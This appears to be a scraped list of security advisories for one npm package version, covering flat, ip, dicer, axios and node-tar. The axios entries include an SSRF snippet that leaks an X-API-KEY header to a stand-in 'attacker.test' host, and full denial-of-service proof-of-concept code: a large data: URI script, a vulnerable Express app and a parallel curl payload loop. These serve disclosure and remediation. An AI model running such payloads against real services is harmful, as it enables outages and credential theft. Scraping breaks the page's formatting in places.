All the vulnerabilities related to the version 1.64.2 of the package
flat vulnerable to Prototype Pollution
flat helps flatten/unflatten nested Javascript objects. A vulnerability, which was classified as critical, was found in hughsk flat up to 5.0.0. This affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to initiate the attack remotely. Upgrading to version 5.0.1 can address this issue. The name of the patch is 20ef0ef55dfa028caddaedbcb33efbdb04d18e13. It is recommended to upgrade the affected component. The identifier VDB-216777 was assigned to this vulnerability.
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
Crash in HeaderParser in dicer
This affects all versions of the package dicer
. A malicious attacker can send a modified form to the server and crash the Node.js service. A complete denial of service can be achieved by sending the malicious form in a loop.
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
baseURL
is set, passing an absolute URL such as http://attacker.test/
to get()
should not ignore baseURL
.baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL
.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
baseURL
and does not validate path parameters is affected by this issue.Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the data:
scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer
/Blob
) and returns a synthetic 200 response.
This path ignores maxContentLength
/ maxBodyLength
(which only protect HTTP responses), so an attacker can supply a very large data:
URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'
.
The Node adapter (lib/adapters/http.js
) supports the data:
scheme. When axios
encounters a request whose URL starts with data:
, it does not perform an HTTP request. Instead, it calls fromDataURI()
to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)
:
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)
:
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
config.maxContentLength
or config.maxBodyLength
, which only apply to HTTP streams.data:
URI of arbitrary size can cause the Node process to allocate the entire content into memory.In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes
exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)
. No such check occurs for data:
URIs.
const axios = require('axios');
async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});
console.log('Received bytes:', response.data.length);
}
main().catch(err => {
console.error('Error:', err.message);
});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength
, maxBodyLength
and decodes into memory on Node before streaming enabling DoS.
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
Run this app and send 3 post requests:
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```
Enforce size limits
For protocol === 'data:'
, inspect the length of the Base64 payload before decoding. If config.maxContentLength
or config.maxBodyLength
is set, reject URIs whose payload exceeds the limit.
Stream decoding
Instead of decoding the entire payload in one Buffer.from
call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar
package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt
it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt
, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago